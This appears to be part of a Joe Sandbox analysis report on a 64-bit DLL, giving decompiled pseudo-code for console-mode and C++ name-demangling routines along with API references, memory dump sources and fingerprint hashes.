                                                                      				if (_t116 != 0) goto 0x8005475a;
                                                                      				_t117 = _v96;
                                                                      				if (_t117 == 0) goto 0x80054730;
                                                                      				if (_t117 != 5) goto 0x80054720;
                                                                      				 *((char*)(_t185 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t185 + 0x2c)) = 9;
                                                                      				 *((char*)(_t185 + 0x38)) = 1;
                                                                      				 *(_t185 + 0x34) = _t117;
                                                                      				goto 0x800544c3;
                                                                      				_t207 = _t185;
                                                                      				E00000001180013AD4(_v96, _t207);
                                                                      				goto 0x800544c3;
                                                                      				if (( *( *((intOrPtr*)(0x80071840 + _t207 * 8)) + 0x38 + _t228 * 8) & 0x00000040) == 0) goto 0x80054742;
                                                                      				if ( *_t229 == 0x1a) goto 0x80054761;
                                                                      				 *(_t185 + 0x34) =  *(_t185 + 0x34) & 0x00000000;
                                                                      				 *((char*)(_t185 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t185 + 0x2c)) = 0x1c;
                                                                      				 *((char*)(_t185 + 0x38)) = 1;
                                                                      				goto 0x800544c3;
                                                                      				goto 0x80054763;
                                                                      				return 0;
                                                                      			}



































                                                                      0x180054464
                                                                      0x18005447a
                                                                      0x180054480
                                                                      0x180054483
                                                                      0x180054489
                                                                      0x180054492
                                                                      0x180054494
                                                                      0x180054499
                                                                      0x18005449c
                                                                      0x1800544a2
                                                                      0x1800544a9
                                                                      0x1800544b1
                                                                      0x1800544b4
                                                                      0x1800544b9
                                                                      0x1800544be
                                                                      0x1800544c6
                                                                      0x1800544db
                                                                      0x1800544df
                                                                      0x1800544e3
                                                                      0x1800544f1
                                                                      0x1800544f6
                                                                      0x1800544ff
                                                                      0x180054507
                                                                      0x18005450e
                                                                      0x180054512
                                                                      0x18005451a
                                                                      0x180054530
                                                                      0x18005453f
                                                                      0x180054549
                                                                      0x18005454e
                                                                      0x18005455e
                                                                      0x180054569
                                                                      0x18005456b
                                                                      0x180054574
                                                                      0x18005458f
                                                                      0x180054598
                                                                      0x18005459e
                                                                      0x1800545a5
                                                                      0x1800545ab
                                                                      0x1800545af
                                                                      0x1800545b3
                                                                      0x1800545b9
                                                                      0x1800545c9
                                                                      0x1800545cd
                                                                      0x1800545d2
                                                                      0x1800545d9
                                                                      0x1800545db
                                                                      0x1800545de
                                                                      0x1800545e5
                                                                      0x1800545f9
                                                                      0x1800545fb
                                                                      0x1800545fd
                                                                      0x180054609
                                                                      0x18005460f
                                                                      0x180054617
                                                                      0x18005461a
                                                                      0x18005461f
                                                                      0x180054622
                                                                      0x180054631
                                                                      0x180054636
                                                                      0x18005463d
                                                                      0x180054656
                                                                      0x18005465a
                                                                      0x18005465d
                                                                      0x180054662
                                                                      0x180054667
                                                                      0x18005466d
                                                                      0x18005467a
                                                                      0x18005467f
                                                                      0x180054681
                                                                      0x18005468e
                                                                      0x180054693
                                                                      0x180054695
                                                                      0x1800546a2
                                                                      0x1800546a7
                                                                      0x1800546b4
                                                                      0x1800546b7
                                                                      0x1800546bf
                                                                      0x1800546c3
                                                                      0x1800546ce
                                                                      0x1800546d0
                                                                      0x1800546d6
                                                                      0x1800546dc
                                                                      0x1800546e1
                                                                      0x1800546fb
                                                                      0x1800546fd
                                                                      0x180054702
                                                                      0x180054707
                                                                      0x180054709
                                                                      0x18005470d
                                                                      0x180054714
                                                                      0x180054718
                                                                      0x18005471b
                                                                      0x180054723
                                                                      0x180054726
                                                                      0x18005472b
                                                                      0x18005473a
                                                                      0x180054740
                                                                      0x180054742
                                                                      0x180054746
                                                                      0x18005474a
                                                                      0x180054751
                                                                      0x180054755
                                                                      0x18005475f
                                                                      0x180054773

                                                                      APIs
                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,0000000180015306,?,?,0000000180015306,0000000180015306,?,0000000180015306,0000000180015306,0000000180054404), ref: 0000000180054587
                                                                      • GetLastError.KERNEL32(?,?,?,?,0000000180015306,?,?,0000000180015306,0000000180015306,?,0000000180015306,0000000180015306,0000000180054404), ref: 0000000180054611
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
                                                                      • Opcode ID: dd4238a744b076b781d05cf1bed0a567a77e5719ff240a80b4666a7aa2b64be0
                                                                      • Instruction ID: c6c4e24da5a2169f6bb37e38d57bc38e83a02099aa0772d5310a27277e0d6893
                                                                      • Opcode Fuzzy Hash: dd4238a744b076b781d05cf1bed0a567a77e5719ff240a80b4666a7aa2b64be0
                                                                      • Instruction Fuzzy Hash: 6591C273710A588AFBA2CB6594807ED27A0F34D7DCF448106FE0A6B695DF36C649C711
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E00000001180008E04(void* __edi, void* __eflags, void* __rax, long long __rbx, signed long long* __rcx, void* __rdx, void* __rdi, long long __rsi, void* __r8, long long __r12, long long _a8, long long _a16, long long _a24) {
                                                                      				void* _v24;
                                                                      				char _v56;
                                                                      				char _v72;
                                                                      				signed int _v80;
                                                                      				signed long long _v88;
                                                                      				signed long long _v96;
                                                                      				char _v104;
                                                                      				signed int _v112;
                                                                      				char _v120;
                                                                      				signed int _t70;
                                                                      				void* _t85;
                                                                      				void* _t86;
                                                                      				signed int _t96;
                                                                      				signed int _t98;
                                                                      				signed int _t99;
                                                                      				signed long long _t106;
                                                                      				intOrPtr* _t126;
                                                                      				intOrPtr* _t127;
                                                                      				long long _t129;
                                                                      				long long _t130;
                                                                      				signed char* _t131;
                                                                      				intOrPtr* _t132;
                                                                      				intOrPtr* _t134;
                                                                      				char* _t135;
                                                                      				signed long long* _t139;
                                                                      				void* _t175;
                                                                      				void* _t176;
                                                                      				signed long long _t180;
                                                                      				long long _t182;
                                                                      
                                                                      				_t178 = __r12;
                                                                      				_t170 = __r8;
                                                                      				_t164 = __rsi;
                                                                      				_t163 = __rdi;
                                                                      				_t155 = __rdx;
                                                                      				_t95 = __edi;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rsi;
                                                                      				_a24 = __r12;
                                                                      				_t139 = __rcx;
                                                                      				 *0x8007132c =  *0x8007132c + 1;
                                                                      				_t70 =  *0x80071318; // 0x0
                                                                      				asm("bt eax, 0xd");
                                                                      				if (__eflags >= 0) goto 0x80008e66;
                                                                      				asm("btr eax, 0xd");
                                                                      				 *0x80071318 = _t70;
                                                                      				E00000001180008CF0(0, __edi, __eflags, __rax, __rcx,  &_v104, __rdx, __rdi, __rsi, __r8);
                                                                      				asm("bts dword [0x684c4], 0xd");
                                                                      				 *_t139 = _v104;
                                                                      				_t139[1] = _v96;
                                                                      				goto 0x800090c2;
                                                                      				_t126 =  *0x80071308; // 0x0
                                                                      				_t87 =  *_t126;
                                                                      				if ( *_t126 != 0x3f) goto 0x800090a6;
                                                                      				_t127 = _t126 + 1;
                                                                      				 *0x80071308 = _t127;
                                                                      				if ( *_t127 != 0x3f) goto 0x80008ed6;
                                                                      				if ( *((intOrPtr*)(_t127 + 1)) != 0x3f) goto 0x80008eb1;
                                                                      				E00000001180008E04(__edi,  *((intOrPtr*)(_t127 + 1)) - 0x3f, _t127 + 1, _t139,  &_v104, _t155, __rdi, __rsi, _t170, __r12);
                                                                      				_t129 =  *0x80071308; // 0x0
                                                                      				goto 0x80008eaa;
                                                                      				_t130 = _t129 + 1;
                                                                      				 *0x80071308 = _t130;
                                                                      				if ( *_t130 != 0) goto 0x80008ea0;
                                                                      				goto 0x80008e54;
                                                                      				if ( *_t130 != 0x24) goto 0x80008ec3;
                                                                      				E0000000118000C268(_t86,  *_t126, 1, __edi, _t139,  &_v120, _t155, __rdi, _t164);
                                                                      				goto 0x80008ee4;
                                                                      				 *0x80071308 = _t130;
                                                                      				r8d = 0;
                                                                      				E0000000118000A220( *_t126, 0, _t95, _t139,  &_v120, _t163, _t164, _t170, _t178);
                                                                      				goto 0x80008ee4;
                                                                      				r8d = 0;
                                                                      				E0000000118000D698(_t86, _t87, 1, _t95, _t139,  &_v120, _t163, _t164, _t170, _t175, _t176);
                                                                      				_t96 = _v112;
                                                                      				_t180 = _v120;
                                                                      				_t106 = _t180;
                                                                      				if (_t106 == 0) goto 0x80008efe;
                                                                      				asm("bt esi, 0x9");
                                                                      				if (_t106 >= 0) goto 0x80008efe;
                                                                      				r12d = 1;
                                                                      				goto 0x80008f01;
                                                                      				r12d = 0;
                                                                      				r15d = _t96;
                                                                      				r15d = r15d >> 0xf;
                                                                      				r15d = r15d & 0x00000001;
                                                                      				if (_v112 - 1 <= 0) goto 0x80008f1d;
                                                                      				 *_t139 = _t180;
                                                                      				_t139[1] = _t96;
                                                                      				goto 0x800090c2;
                                                                      				_t131 =  *0x80071308; // 0x0
                                                                      				if (( *_t131 & 0x000000bf) == 0) goto 0x80009010;
                                                                      				E0000000118000B5B8(_t95, _t139,  &_v104, _t163, _t164, _t175, _t176, _t178);
                                                                      				if (_v104 == 0) goto 0x80009010;
                                                                      				if ( *0x8007131c == 0) goto 0x80008fc7;
                                                                      				 *0x8007131c = 0;
                                                                      				E00000001180005F48( &_v120,  &_v88,  &_v104);
                                                                      				_v120 =  *_t131;
                                                                      				_v112 = _t131[8];
                                                                      				_t132 =  *0x80071308; // 0x0
                                                                      				if ( *_t132 == 0x40) goto 0x80009010;
                                                                      				E0000000118000B5B8(_t95, _t139,  &_v88, _t163, _t164, _t175, _t176, _t178);
                                                                      				_v104 =  *_t132;
                                                                      				_v96 =  *(_t132 + 8);
                                                                      				_v88 = "::";
                                                                      				_v80 = 2;
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				asm("movdqa [ebp-0x40], xmm0");
                                                                      				E00000001180005F1C( &_v104,  &_v72,  &_v88);
                                                                      				goto 0x80008ff7;
                                                                      				_t134 = "::";
                                                                      				_v88 = _t134;
                                                                      				_v80 = 2;
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				asm("movdqa [ebp-0x40], xmm0");
                                                                      				E00000001180005F1C( &_v104,  &_v56,  &_v88);
                                                                      				E00000001180005F48(_t134,  &_v72,  &_v120);
                                                                      				_t98 =  *(_t134 + 8);
                                                                      				_t182 =  *_t134;
                                                                      				_v112 = _t98;
                                                                      				_v120 = _t182;
                                                                      				if (r12d == 0) goto 0x80009021;
                                                                      				if (_t182 == 0) goto 0x80009021;
                                                                      				asm("bts esi, 0x9");
                                                                      				_v112 = _t98;
                                                                      				if (r15d == 0) goto 0x80009030;
                                                                      				_t99 = _t98 | 0x00008000;
                                                                      				_v112 = _t99;
                                                                      				if (_t182 == 0) goto 0x80008f12;
                                                                      				if ((0x00001000 & _t99) != 0) goto 0x80008f12;
                                                                      				_t135 =  *0x80071308; // 0x0
                                                                      				if ( *_t135 == 0) goto 0x8000906c;
                                                                      				if ( *_t135 == 0x40) goto 0x80009065;
                                                                      				_t139[1] = _t139[1] & 0x00000000;
                                                                      				_t139[1] = 2;
                                                                      				 *_t139 =  *_t139 & 0x00000000;
                                                                      				goto 0x800090c2;
                                                                      				 *0x80071308 =  *0x80071308 + 1;
                                                                      				if (( *0x80071318 & 0x00001000) == 0) goto 0x80009098;
                                                                      				if (r12d != 0) goto 0x80009098;
                                                                      				if ((0x00008000 & _t99) != 0) goto 0x80009098;
                                                                      				_v88 = _v88 & 0x00000000;
                                                                      				_v80 = _v80 & r12d;
                                                                      				E000000011800063E0(_t139,  &_v56,  &_v88);
                                                                      				goto 0x80008f12;
                                                                      				_t85 = E000000011800063E0(_t139, _t139,  &_v120);
                                                                      				goto 0x800090c2;
                                                                      				 *_t139 =  *_t139 & 0x00000000;
                                                                      				_t139[1] = _t139[1] & 0x00000000;
                                                                      				if (0x8000 == 0) goto 0x800090b8;
                                                                      				_t139[1] = 2;
                                                                      				goto 0x800090c2;
                                                                      				 *_t139 = 0x8005f780;
                                                                      				 *0x8007132c =  *0x8007132c - 1;
                                                                      				return _t85;
                                                                      			}
































                                                                      0x180008e04
                                                                      0x180008e04
                                                                      0x180008e04
                                                                      0x180008e04
                                                                      0x180008e04
                                                                      0x180008e04
                                                                      0x180008e04
                                                                      0x180008e09
                                                                      0x180008e0e
                                                                      0x180008e22
                                                                      0x180008e25
                                                                      0x180008e2b
                                                                      0x180008e31
                                                                      0x180008e35
                                                                      0x180008e37
                                                                      0x180008e3b
                                                                      0x180008e47
                                                                      0x180008e4c
                                                                      0x180008e58
                                                                      0x180008e5e
                                                                      0x180008e61
                                                                      0x180008e66
                                                                      0x180008e6d
                                                                      0x180008e73
                                                                      0x180008e79
                                                                      0x180008e7c
                                                                      0x180008e85
                                                                      0x180008e8c
                                                                      0x180008e92
                                                                      0x180008e97
                                                                      0x180008e9e
                                                                      0x180008ea0
                                                                      0x180008ea3
                                                                      0x180008ead
                                                                      0x180008eaf
                                                                      0x180008eb8
                                                                      0x180008ebc
                                                                      0x180008ec1
                                                                      0x180008ec3
                                                                      0x180008eca
                                                                      0x180008ecf
                                                                      0x180008ed4
                                                                      0x180008ed6
                                                                      0x180008edf
                                                                      0x180008ee4
                                                                      0x180008ee7
                                                                      0x180008eeb
                                                                      0x180008eee
                                                                      0x180008ef0
                                                                      0x180008ef4
                                                                      0x180008ef6
                                                                      0x180008efc
                                                                      0x180008efe
                                                                      0x180008f01
                                                                      0x180008f04
                                                                      0x180008f08
                                                                      0x180008f10
                                                                      0x180008f12
                                                                      0x180008f15
                                                                      0x180008f18
                                                                      0x180008f1d
                                                                      0x180008f27
                                                                      0x180008f31
                                                                      0x180008f3b
                                                                      0x180008f48
                                                                      0x180008f4a
                                                                      0x180008f5d
                                                                      0x180008f65
                                                                      0x180008f6c
                                                                      0x180008f6f
                                                                      0x180008f79
                                                                      0x180008f83
                                                                      0x180008f8b
                                                                      0x180008f92
                                                                      0x180008f9c
                                                                      0x180008fa0
                                                                      0x180008fa7
                                                                      0x180008fab
                                                                      0x180008fbc
                                                                      0x180008fc5
                                                                      0x180008fc7
                                                                      0x180008fce
                                                                      0x180008fd2
                                                                      0x180008fd9
                                                                      0x180008fdd
                                                                      0x180008fee
                                                                      0x180008ffe
                                                                      0x180009003
                                                                      0x180009006
                                                                      0x180009009
                                                                      0x18000900c
                                                                      0x180009013
                                                                      0x180009018
                                                                      0x18000901a
                                                                      0x18000901e
                                                                      0x180009029
                                                                      0x18000902b
                                                                      0x18000902d
                                                                      0x180009033
                                                                      0x180009040
                                                                      0x180009046
                                                                      0x180009050
                                                                      0x180009055
                                                                      0x180009057
                                                                      0x18000905b
                                                                      0x18000905f
                                                                      0x180009063
                                                                      0x180009065
                                                                      0x180009072
                                                                      0x180009077
                                                                      0x18000907b
                                                                      0x18000907d
                                                                      0x180009082
                                                                      0x18000908e
                                                                      0x180009093
                                                                      0x18000909f
                                                                      0x1800090a4
                                                                      0x1800090a6
                                                                      0x1800090aa
                                                                      0x1800090b0
                                                                      0x1800090b2
                                                                      0x1800090b6
                                                                      0x1800090bf
                                                                      0x1800090c2
                                                                      0x1800090e7

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID:
                                                                      • API String ID: 2943138195-0
                                                                      • Opcode ID: f0ec88ef4cf4e92aa34862ccf87c9fcb1bcab843ce81abbd28ca294ced7158b6
                                                                      • Instruction ID: 9a704f9b7d398e866166ad7263ee13ae5f7d81770529f2a4de60bd863e3918cf
                                                                      • Opcode Fuzzy Hash: f0ec88ef4cf4e92aa34862ccf87c9fcb1bcab843ce81abbd28ca294ced7158b6
                                                                      • Instruction Fuzzy Hash: A6915D72A10B9889FB92CBA4D8403EC37B1F70C799F54C015EE8927B95DF798A49D740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 84%
                                                                      			E000000011800095C4(void* __eflags, long long __rbx, signed long long* __rcx, void* __rdx, long long __rdi, void* __rsi, char* __r8, void* __r10, long long _a8, long long _a16) {
                                                                      				char _v24;
                                                                      				char _v40;
                                                                      				signed int _v48;
                                                                      				signed int _v56;
                                                                      				char _t41;
                                                                      				void* _t50;
                                                                      				intOrPtr* _t76;
                                                                      				char* _t77;
                                                                      				intOrPtr* _t78;
                                                                      				char* _t79;
                                                                      				signed long long* _t86;
                                                                      				long long _t89;
                                                                      				char* _t90;
                                                                      				signed long long _t98;
                                                                      				long long _t104;
                                                                      				signed long long _t119;
                                                                      				char* _t121;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rdi;
                                                                      				_v56 = _v56 & 0x00000000;
                                                                      				_t86 = __rcx;
                                                                      				_t89 =  *0x80071308; // 0x0
                                                                      				_t121 = __r8;
                                                                      				_v48 = _v48 & 0x00000000;
                                                                      				_t90 = _t89 + 1;
                                                                      				 *0x80071308 = _t90;
                                                                      				r10d =  *_t90;
                                                                      				r8d = r10d;
                                                                      				r8d = r8d - 0x41;
                                                                      				if (__eflags == 0) goto 0x80009779;
                                                                      				r8d = r8d - 1;
                                                                      				if (__eflags == 0) goto 0x8000974b;
                                                                      				if (r8d == 1) goto 0x80009743;
                                                                      				if ( *_t90 == 0) goto 0x80009737;
                                                                      				_t41 =  *((char*)(_t90 + 1));
                                                                      				if (_t41 == 0) goto 0x80009737;
                                                                      				if (r9d != 0) goto 0x80009750;
                                                                      				r10d = r10d << 4;
                                                                      				_t8 = _t90 + 2; // 0x3
                                                                      				_t76 = _t8;
                                                                      				 *0x80071308 = _t76;
                                                                      				if (_t41 + 0xfffffcd0 + r10d - 1 <= 0) goto 0x8000968b;
                                                                      				E00000001180005B90(E00000001180007320(0x2c, _t76, __rcx,  &_v56),  &_v40, __rdx, __rsi, __r10);
                                                                      				E00000001180005F48( &_v56,  &_v24, _t76);
                                                                      				_v56 =  *_t76;
                                                                      				_v48 =  *((intOrPtr*)(_t76 + 8));
                                                                      				r8b = 0x3e;
                                                                      				E00000001180005F74( &_v56,  &_v24);
                                                                      				_t77 =  *0x80071308; // 0x0
                                                                      				_v56 =  *_t76;
                                                                      				_v48 =  *((intOrPtr*)(_t76 + 8));
                                                                      				if ( *_t77 != 0x24) goto 0x800096c0;
                                                                      				_t78 = _t77 + 1;
                                                                      				 *0x80071308 = _t78;
                                                                      				goto 0x800096e4;
                                                                      				r8b = 0x5e;
                                                                      				E00000001180005F74( &_v56,  &_v24);
                                                                      				_t98 =  *_t78;
                                                                      				_t79 =  *0x80071308; // 0x0
                                                                      				_v56 = _t98;
                                                                      				_v48 =  *((intOrPtr*)(_t78 + 8));
                                                                      				_t119 = _t98;
                                                                      				if ( *_t79 == 0) goto 0x800096f8;
                                                                      				 *0x80071308 = _t79 + 1;
                                                                      				goto 0x80009728;
                                                                      				if (_v48 - 1 > 0) goto 0x80009728;
                                                                      				if (_t119 == 0) goto 0x8000971c;
                                                                      				E00000001180005584(_t79 + 1, _t86,  &_v56, 0x8005f780);
                                                                      				goto 0x80009728;
                                                                      				asm("bts edx, 0xe");
                                                                      				 *_t86 = 0x8005f780;
                                                                      				_t86[1] = 1;
                                                                      				goto 0x800097b8;
                                                                      				 *_t86 = 0x8005f780;
                                                                      				goto 0x800097b4;
                                                                      				 *0x8005f780 = 5;
                                                                      				goto 0x8000976d;
                                                                      				if (r9d == 0) goto 0x8000975e;
                                                                      				_t86[1] = _t86[1] & 0x00000000;
                                                                      				 *_t86 =  *_t86 & 0x00000000;
                                                                      				_t86[1] = 2;
                                                                      				goto 0x800097b8;
                                                                      				 *_t121 = 1;
                                                                      				E00000001180007320(0x3e, _t79 + 1, _t86,  &_v56);
                                                                      				goto 0x800097a9;
                                                                      				if (r9d != 0) goto 0x800097a5;
                                                                      				r8d =  *0x8005f780;
                                                                      				_t35 = _t119 - 2; // -67
                                                                      				_t50 = _t35;
                                                                      				if (_t50 - 1 <= 0) goto 0x80009798;
                                                                      				if (r8d != 1) goto 0x800097a5;
                                                                      				 *0x8005f780 = 4;
                                                                      				goto 0x8000979e;
                                                                      				 *0x8005f780 = 5;
                                                                      				_t104 =  *0x80071308; // 0x0
                                                                      				_t36 = _t104 + 1; // 0x1
                                                                      				 *_t86 =  *_t86 & 0x00000000;
                                                                      				 *0x80071308 = _t36;
                                                                      				_t86[1] = _t86[1] & 0x00000000;
                                                                      				return _t50;
                                                                      			}




















                                                                      0x1800095c4
                                                                      0x1800095c9
                                                                      0x1800095d6
                                                                      0x1800095db
                                                                      0x1800095de
                                                                      0x1800095e5
                                                                      0x1800095e8
                                                                      0x1800095ec
                                                                      0x1800095ef
                                                                      0x1800095f6
                                                                      0x1800095fa
                                                                      0x1800095fd
                                                                      0x180009601
                                                                      0x180009607
                                                                      0x18000960b
                                                                      0x180009615
                                                                      0x18000961e
                                                                      0x180009624
                                                                      0x18000962a
                                                                      0x180009633
                                                                      0x18000963b
                                                                      0x180009645
                                                                      0x180009645
                                                                      0x18000964c
                                                                      0x180009656
                                                                      0x180009669
                                                                      0x180009679
                                                                      0x180009684
                                                                      0x180009688
                                                                      0x18000968b
                                                                      0x180009696
                                                                      0x1800096a1
                                                                      0x1800096a8
                                                                      0x1800096ac
                                                                      0x1800096b2
                                                                      0x1800096b4
                                                                      0x1800096b7
                                                                      0x1800096be
                                                                      0x1800096c0
                                                                      0x1800096cb
                                                                      0x1800096d0
                                                                      0x1800096d6
                                                                      0x1800096dd
                                                                      0x1800096e1
                                                                      0x1800096e7
                                                                      0x1800096ea
                                                                      0x1800096ef
                                                                      0x1800096f6
                                                                      0x1800096fc
                                                                      0x180009701
                                                                      0x18000970e
                                                                      0x18000971a
                                                                      0x180009728
                                                                      0x18000972c
                                                                      0x18000972f
                                                                      0x180009732
                                                                      0x18000973e
                                                                      0x180009741
                                                                      0x180009743
                                                                      0x180009749
                                                                      0x18000974e
                                                                      0x180009750
                                                                      0x180009754
                                                                      0x180009758
                                                                      0x18000975c
                                                                      0x180009760
                                                                      0x180009768
                                                                      0x180009777
                                                                      0x18000977c
                                                                      0x18000977e
                                                                      0x180009781
                                                                      0x180009781
                                                                      0x180009788
                                                                      0x18000978e
                                                                      0x180009790
                                                                      0x180009796
                                                                      0x180009798
                                                                      0x18000979e
                                                                      0x1800097a5
                                                                      0x1800097a9
                                                                      0x1800097ad
                                                                      0x1800097b4
                                                                      0x1800097ca

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+$NameName::
                                                                      • String ID:
                                                                      • API String ID: 168861036-0
                                                                      • Opcode ID: a5dcbd8f269222d9fdda71ed20b49dfbfc21c7ef031cb701fd6217a551d809c9
                                                                      • Instruction ID: 584908c0a383f9f7c10450ed07701c768c57bdfe79867d014ab2253bcd12ad0e
                                                                      • Opcode Fuzzy Hash: a5dcbd8f269222d9fdda71ed20b49dfbfc21c7ef031cb701fd6217a551d809c9
                                                                      • Instruction Fuzzy Hash: 3F513F72A29A5889FB92CFA4E8407EC37A1E34CBC9F54C011EA4D57796DF3AC649C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E0000000118000BA6C(signed int __ecx, void* __edi, intOrPtr* __rax, long long __rbx, signed long long* __rcx, void* __rdx, void* __rdi, void* __rsi, void* __r8, void* __r10, void* __r11, void* __r12, long long __r14, long long _a8, long long _a16) {
                                                                      				char _v24;
                                                                      				char _v40;
                                                                      				char _v56;
                                                                      				signed int _v64;
                                                                      				char _v72;
                                                                      				signed int _t36;
                                                                      				signed int _t43;
                                                                      				void* _t44;
                                                                      				signed int _t45;
                                                                      				intOrPtr* _t55;
                                                                      				intOrPtr* _t56;
                                                                      				char* _t57;
                                                                      				char* _t58;
                                                                      				signed long long* _t62;
                                                                      				signed long long _t70;
                                                                      				long long _t94;
                                                                      
                                                                      				_t80 = __rsi;
                                                                      				_t79 = __rdi;
                                                                      				_t55 = __rax;
                                                                      				_t45 = __ecx;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __r14;
                                                                      				 *__rcx =  *__rcx & 0x00000000;
                                                                      				_t62 = __rcx;
                                                                      				__rcx[1] = __rcx[1] & 0x00000000;
                                                                      				r8d = 0;
                                                                      				E0000000118000D698(_t44, __ecx, 1, __edi, __rcx,  &_v56, __rdi, __rsi, __r8, __r10, __r11);
                                                                      				_t94 = "::";
                                                                      				 *__rcx =  *_t55;
                                                                      				_t36 =  *(_t55 + 8);
                                                                      				__rcx[1] = _t36;
                                                                      				_t56 =  *0x80071308; // 0x0
                                                                      				if (_t36 != 0) goto 0x8000bb0e;
                                                                      				if ( *_t56 == 0) goto 0x8000bb0e;
                                                                      				if ( *_t56 == 0x40) goto 0x8000bb13;
                                                                      				_v72 = _t94;
                                                                      				_v64 = 2;
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				asm("movdqa [ebp-0x40], xmm0");
                                                                      				E0000000118000B5B8(__edi, __rcx,  &_v56, _t79, _t80, __r10, __r11, __r12);
                                                                      				E00000001180005F1C(_t56,  &_v40,  &_v72);
                                                                      				E00000001180005F48(_t56,  &_v24, _t62);
                                                                      				_t70 =  *_t56;
                                                                      				 *_t62 = _t70;
                                                                      				_t62[1] =  *(_t56 + 8);
                                                                      				_t57 =  *0x80071308; // 0x0
                                                                      				if ( *_t57 != 0x40) goto 0x8000bb1f;
                                                                      				_t58 = _t57 + 1;
                                                                      				 *0x80071308 = _t58;
                                                                      				goto 0x8000bb92;
                                                                      				if ( *_t58 == 0) goto 0x8000bb32;
                                                                      				_t62[1] = _t62[1] & 0x00000000;
                                                                      				 *_t62 =  *_t62 & 0x00000000;
                                                                      				_t62[1] = 2;
                                                                      				goto 0x8000bb92;
                                                                      				if (_t70 != 0) goto 0x8000bb4a;
                                                                      				_t62[1] = _t62[1] & _t45;
                                                                      				_t62[1] = 1;
                                                                      				 *_t62 = 0x8005f780;
                                                                      				goto 0x8000bb92;
                                                                      				_v72 = _t94;
                                                                      				_v64 = 2;
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				_v64 = _v64 & 0x00000000;
                                                                      				asm("movdqa [ebp-0x30], xmm0");
                                                                      				_v72 = 0x8005f780;
                                                                      				E00000001180005F1C( &_v72,  &_v24,  &_v56);
                                                                      				E00000001180005F48(0x8005f780,  &_v40, _t62);
                                                                      				 *_t62 =  *0x8005f780;
                                                                      				_t43 =  *0x18005F788;
                                                                      				_t62[1] = _t43;
                                                                      				return _t43;
                                                                      			}



















                                                                      0x18000ba6c
                                                                      0x18000ba6c
                                                                      0x18000ba6c
                                                                      0x18000ba6c
                                                                      0x18000ba6c
                                                                      0x18000ba71
                                                                      0x18000ba7e
                                                                      0x18000ba82
                                                                      0x18000ba85
                                                                      0x18000ba89
                                                                      0x18000ba92
                                                                      0x18000ba97
                                                                      0x18000baa1
                                                                      0x18000baa4
                                                                      0x18000baa9
                                                                      0x18000baac
                                                                      0x18000bab3
                                                                      0x18000bab8
                                                                      0x18000babd
                                                                      0x18000babf
                                                                      0x18000bac7
                                                                      0x18000bace
                                                                      0x18000bad2
                                                                      0x18000bad7
                                                                      0x18000bae7
                                                                      0x18000baf6
                                                                      0x18000bafb
                                                                      0x18000bafe
                                                                      0x18000bb04
                                                                      0x18000bb07
                                                                      0x18000bb11
                                                                      0x18000bb13
                                                                      0x18000bb16
                                                                      0x18000bb1d
                                                                      0x18000bb22
                                                                      0x18000bb24
                                                                      0x18000bb28
                                                                      0x18000bb2c
                                                                      0x18000bb30
